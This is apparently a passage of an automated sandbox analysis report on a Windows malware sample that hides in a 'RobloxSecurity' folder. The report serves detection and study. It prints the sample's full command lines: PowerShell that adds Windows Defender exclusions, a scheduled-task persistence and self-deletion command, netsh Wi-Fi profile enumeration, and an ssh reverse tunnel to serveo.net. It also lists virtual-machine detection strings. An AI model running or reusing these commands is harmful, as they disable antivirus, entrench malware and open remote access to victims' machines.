                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596110
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598984
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598656
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597970
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597844
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.41.drBinary or memory string: VMware
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.41.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.41.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.41.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.41.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2063310153.0000010DD583F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                  Source: Amcache.hve.41.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.41.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.41.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.41.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3543453931.00000167CFE24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                  Source: Amcache.hve.41.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.41.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.41.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.41.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000000.1791180656.000001F995EB2000.00000002.00000001.01000000.00000008.sdmp, vkefq4cv.oil.exe.0.dr, vkefq4cv.oil.exe.4.drBinary or memory string: qemu'H
                  Source: Amcache.hve.41.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.41.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.41.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.41.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.41.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.41.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.41.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.41.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.41.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: vkefq4cv.oil.exe, 0000002C.00000002.3000161085.000001EC7F363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                  Source: Amcache.hve.41.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Users\user\Desktop\jqOHOuPMJP.exe VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
